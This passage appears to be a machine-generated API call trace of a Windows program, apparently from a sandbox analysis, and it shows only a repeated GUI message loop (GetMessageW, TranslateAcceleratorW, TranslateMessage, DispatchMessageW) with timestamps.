DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.196] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.196] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.196] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.196] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.197] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.243] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.243] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.243] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.243] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.243] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.243] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.243] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.244] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.290] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.290] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.290] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.290] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.290] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.290] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.290] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.291] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.501] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.501] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.501] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.501] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.501] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.501] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.502] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.506] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.536] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.536] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.536] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.536] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.536] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.536] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.536] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.537] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.583] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.583] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.583] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.583] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.583] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.583] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.583] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.584] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.630] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.630] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.630] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.630] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0087.630] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0087.630] TranslateMessage (lpMsg=0x18e548) returned 0 [0087.630] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0087.631] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.238] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.239] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.239] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.239] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.239] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.239] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.239] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.241] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.285] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.285] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.285] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.285] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.285] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.285] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.285] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.287] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.332] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.332] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.332] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.332] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.332] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.332] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.332] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.333] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0088.378] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0088.378] TranslateMessage (lpMsg=0x18e548) returned 0 [0088.378] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0088.379] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.345] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.345] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.345] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.346] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.392] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.392] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.392] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.392] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.392] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.392] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.393] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.394] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.440] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.441] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.441] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.441] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.441] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.441] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.441] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.442] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.486] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.486] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.486] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.486] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.486] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.486] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.486] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.487] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.533] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.533] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.533] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.533] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.533] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.533] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.533] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.534] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.582] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.582] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.582] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.582] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.582] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.582] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.582] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.583] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.626] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.626] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.626] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.627] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.627] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.627] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.627] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.628] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.673] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.673] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.673] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.673] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.673] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.673] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.673] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.674] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.720] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.720] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.720] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.720] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.720] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.720] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.720] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.721] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.788] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.788] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.788] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.789] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.789] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.789] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.789] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.790] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.829] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.829] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.829] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.829] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.829] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.829] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.830] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.831] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.876] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.876] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.876] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.876] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.876] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.876] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.876] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.877] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.923] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.923] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.923] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.923] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.923] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.923] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.923] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.924] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0089.970] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0089.970] TranslateMessage (lpMsg=0x18e548) returned 0 [0089.970] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0089.970] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.953] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0092.953] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.953] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.953] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.289] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.289] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.289] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.289] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.289] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.289] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.289] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.291] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.308] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.308] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.308] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.308] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.308] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.308] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.309] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.310] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.388] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.388] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.388] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.388] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.388] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.388] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.388] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.389] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.402] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.402] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.402] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.402] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.402] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.402] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.402] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.403] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.469] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.469] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.469] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.469] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.469] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.469] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.469] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.470] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.496] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.496] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.496] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.496] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.496] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.496] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.496] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.497] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.543] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.543] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.543] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.543] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.543] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.543] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.543] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.545] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.589] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.589] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.589] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.589] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.589] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.589] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.589] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.591] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.636] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.636] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.636] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.636] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.636] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.636] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.636] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.637] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.688] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.688] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.688] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.688] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.688] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.688] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.688] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.689] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.729] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.729] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.730] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.730] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.730] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.730] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.730] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.731] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.776] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.776] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.776] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.776] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.776] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.776] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.776] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.777] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.823] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0093.823] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.823] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.823] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0096.219] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 